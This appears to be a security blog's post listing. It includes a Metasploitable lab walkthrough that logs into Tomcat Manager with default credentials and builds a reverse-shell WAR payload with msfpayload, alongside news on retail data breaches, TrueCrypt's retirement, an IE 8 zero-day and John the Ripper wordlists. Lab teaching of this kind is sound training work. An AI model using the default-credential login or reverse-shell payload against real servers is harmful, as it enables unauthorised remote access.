Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot.  There is no reason to believe only some stores were effected, and chances are the breach is spread across the companies 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014.  If that is the case, we need to think of the impact this could have.  If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debt cards.

New Video Series

We are excited to announce we have started production on our first video series!  “Metasploitable without Metasploit”  The focus of this video series it to teach the up and coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

Shaws and Star Market Data Breach – What You Need To Know

So yes yet again we are faced with another data breach of a major chain of retail stores. This time it is Shaws and Star Market. These companies are owned by Albertsons.

At this point the details have not been released. It would appear that the Point of Sale (POS) system was probably targeted to steal the customer information.

So what did they get? Allegedly they have Names,Expiration Dates, Card Numbers, Pin Numbers (Unclear), and 3 digit security codes. Customers that shopped at Shaws and Star Markets between June 22 and July 17 should keep a close eye on their bank accounts and report any discrepancies to their financial institutions.

TrueCrypt is dead…

Yes the rumors are true…  TrueCrypt after a decade has been retired.  The developers are urging people to switch to their native OS encryption (BitLocker, LVM, FileVault).  You can read more from them here –> http://truecrypt.sourceforge.net/

I am not going to get to far into this as I feel Steve Gibson at GRC has done a great job, and I will link you to his blog post about TrueCrypt.

Yes… TrueCrypt is still safe to use.

https://www.grc.com/misc/truecrypt/truecrypt.htm

-JT

IE Zero Day? Lets not Over React!

So yes there is another zero day bug in IE 8.  So what does this mean?  Well for those still using IE 8 there is a good chance you are still running Windows XP which is EOL (End of Life).  So one consideration would be to move to a newer operating system such as Windows 7 or Windows 8.1.  More info can be found here –> http://www.v3.co.uk/v3-uk/news/2346530/microsoft-promises-fix-for-internet-explorer-zero-day-flaw

 

My advice is as follows:

Create Obscure Wordlist’s in John

Create Mangled Password Lists with John

Ok so I made this video because I had a need to create such a list, and I figued if I was doing it I might as well make a video in case anybody else could also use some help with this.  There are many ways to do this I am just showing you the one I used.  Thanks for watching!

Notes:

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.